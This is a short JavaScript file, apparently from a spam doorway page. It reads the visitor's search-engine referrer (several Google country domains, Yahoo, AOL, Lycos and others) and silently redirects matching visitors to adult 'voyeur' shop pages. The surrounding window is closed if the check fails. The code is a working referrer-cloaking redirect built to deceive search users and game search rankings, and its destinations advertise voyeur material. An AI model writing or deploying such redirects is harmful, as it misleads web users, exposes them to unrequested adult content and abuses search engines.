﻿function Weiter() {
var x = meme();
 if(x == false) top.close();
}
window.setTimeout("Weiter()",1802);

function meme() {
var refarray = new Array();
refarray['google.com'] = "slinger.htm";
refarray['google.de'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['google.at'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['aol.de'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['de.search'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['de.altavista'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['t-online.de'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['google.ch'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['yahoo.com'] = "http://www.voyeurland.ch/_/voyeurland.htm";
refarray['lycos.ch'] = "http://www.voyeurland.ch/_/voyeurland.htm";
refarray['google.nl'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['google.at'] = "http://shop.muschiland.com/Voyeur-Nachtsicht_6.htm";
refarray['google.fr'] = "http://www.voyeurland.ch/nudistes-naturistes-sex/voyeur-nudistes-naturistes.html";
for (var i in refarray) {
if (document.referrer.indexOf(i) != -1) document.location.href = (refarray[i]);
}
}
